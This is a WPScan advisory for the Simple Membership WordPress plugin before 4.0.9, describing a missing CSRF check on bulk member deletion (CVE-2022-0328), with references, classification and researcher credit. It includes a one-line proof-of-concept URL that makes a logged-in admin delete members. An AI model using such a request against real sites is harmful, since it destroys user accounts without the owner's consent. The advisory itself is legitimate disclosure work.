WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Simple Membership < 4.0.9 - Arbitrary Member Deletion via CSRF

Description

The plugin does not have CSRF check when deleting members in bulk, which could allow attackers to make a logged in admin delete them via a CSRF attack

Proof of Concept

https://example.com/wp-admin/admin.php?page=simple_wp_membership&action=bulk_delete&members%5B0%5D=1&members%5B1%5D=2

Affects Plugins

simple-membership
Fixed in version 4.0.9

References

CVE
CVE-2022-0328
URL
https://plugins.trac.wordpress.org/changeset/2662855

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
44532b7c-4d0d-4959-ada4-733f377d6ec9

Timeline

Publicly Published

2022-01-25 (about 8 months ago)

Added

2022-01-25 (about 8 months ago)

Last Updated

2022-04-11 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin